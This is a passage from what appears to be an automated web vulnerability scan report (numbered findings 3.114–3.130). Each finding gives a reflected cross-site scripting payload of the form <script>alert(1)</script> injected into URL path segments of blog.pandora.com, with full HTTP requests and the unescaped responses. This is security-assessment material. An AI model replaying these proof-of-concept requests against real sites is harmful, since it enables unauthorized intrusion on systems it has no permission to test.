Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:11 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora6e10b<script>alert(1)</script>bac3aa178c9/archives/2007/07/ was not found on this server.</p>
...[SNIP]...

3.114. http://blog.pandora.com/pandora/archives/2007/07/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/07/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ab862<script>alert(1)</script>9916758d92c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesab862<script>alert(1)</script>9916758d92c/2007/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:13 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesab862<script>alert(1)</script>9916758d92c/2007/07/ was not found on this server.</p>
...[SNIP]...

3.115. http://blog.pandora.com/pandora/archives/2007/07/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/07/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6c196<script>alert(1)</script>20072b4f4e1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20076c196<script>alert(1)</script>20072b4f4e1/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20076c196<script>alert(1)</script>20072b4f4e1/07/ was not found on this server.</p>
...[SNIP]...

3.116. http://blog.pandora.com/pandora/archives/2007/07/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/07/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8c182<script>alert(1)</script>7e15c131859 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/078c182<script>alert(1)</script>7e15c131859/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/078c182<script>alert(1)</script>7e15c131859/ was not found on this server.</p>
...[SNIP]...

3.117. http://blog.pandora.com/pandora/archives/2007/08/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/08/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aeaa6<script>alert(1)</script>49ec8fcf801 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraaeaa6<script>alert(1)</script>49ec8fcf801/archives/2007/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:12 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraaeaa6<script>alert(1)</script>49ec8fcf801/archives/2007/08/ was not found on this server.</p>
...[SNIP]...

3.118. http://blog.pandora.com/pandora/archives/2007/08/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/08/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4c8e6<script>alert(1)</script>556bf3f5c92 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives4c8e6<script>alert(1)</script>556bf3f5c92/2007/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives4c8e6<script>alert(1)</script>556bf3f5c92/2007/08/ was not found on this server.</p>
...[SNIP]...

3.119. http://blog.pandora.com/pandora/archives/2007/08/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/08/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 63082<script>alert(1)</script>4fcc9a5c39d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200763082<script>alert(1)</script>4fcc9a5c39d/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200763082<script>alert(1)</script>4fcc9a5c39d/08/ was not found on this server.</p>
...[SNIP]...

3.120. http://blog.pandora.com/pandora/archives/2007/08/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/08/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c796c<script>alert(1)</script>b994e2fabda was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/08c796c<script>alert(1)</script>b994e2fabda/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/08c796c<script>alert(1)</script>b994e2fabda/ was not found on this server.</p>
...[SNIP]...

3.121. http://blog.pandora.com/pandora/archives/2007/09/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/09/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 20951<script>alert(1)</script>3f4155b1d79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora20951<script>alert(1)</script>3f4155b1d79/archives/2007/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora20951<script>alert(1)</script>3f4155b1d79/archives/2007/09/ was not found on this server.</p>
...[SNIP]...

3.122. http://blog.pandora.com/pandora/archives/2007/09/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/09/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7e680<script>alert(1)</script>f859f382f9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives7e680<script>alert(1)</script>f859f382f9e/2007/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives7e680<script>alert(1)</script>f859f382f9e/2007/09/ was not found on this server.</p>
...[SNIP]...

3.123. http://blog.pandora.com/pandora/archives/2007/09/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/09/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2c7bb<script>alert(1)</script>5838fc16302 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20072c7bb<script>alert(1)</script>5838fc16302/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:00 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20072c7bb<script>alert(1)</script>5838fc16302/09/ was not found on this server.</p>
...[SNIP]...

3.124. http://blog.pandora.com/pandora/archives/2007/09/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/09/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f55fa<script>alert(1)</script>7c644c21c33 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/09f55fa<script>alert(1)</script>7c644c21c33/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/09f55fa<script>alert(1)</script>7c644c21c33/ was not found on this server.</p>
...[SNIP]...

3.125. http://blog.pandora.com/pandora/archives/2007/10/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/10/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f9be9<script>alert(1)</script>acf0b51a28e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraf9be9<script>alert(1)</script>acf0b51a28e/archives/2007/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraf9be9<script>alert(1)</script>acf0b51a28e/archives/2007/10/ was not found on this server.</p>
...[SNIP]...

3.126. http://blog.pandora.com/pandora/archives/2007/10/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/10/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bafa8<script>alert(1)</script>40e95af5aab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesbafa8<script>alert(1)</script>40e95af5aab/2007/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbafa8<script>alert(1)</script>40e95af5aab/2007/10/ was not found on this server.</p>
...[SNIP]...

3.127. http://blog.pandora.com/pandora/archives/2007/10/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/10/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 18bad<script>alert(1)</script>8f17e8b3118 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200718bad<script>alert(1)</script>8f17e8b3118/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200718bad<script>alert(1)</script>8f17e8b3118/10/ was not found on this server.</p>
...[SNIP]...

3.128. http://blog.pandora.com/pandora/archives/2007/10/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/10/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d51e2<script>alert(1)</script>da535d0049d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/10d51e2<script>alert(1)</script>da535d0049d/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/10d51e2<script>alert(1)</script>da535d0049d/ was not found on this server.</p>
...[SNIP]...

3.129. http://blog.pandora.com/pandora/archives/2007/11/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/11/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 17f6e<script>alert(1)</script>7ad2feaf14c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora17f6e<script>alert(1)</script>7ad2feaf14c/archives/2007/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora17f6e<script>alert(1)</script>7ad2feaf14c/archives/2007/11/ was not found on this server.</p>
...[SNIP]...

3.130. http://blog.pandora.com/pandora/archives/2007/11/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/11/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a9e9a<script>alert(1)</script>743af107344 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesa9e9a<script>alert(1)</script>743af107344/2007/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
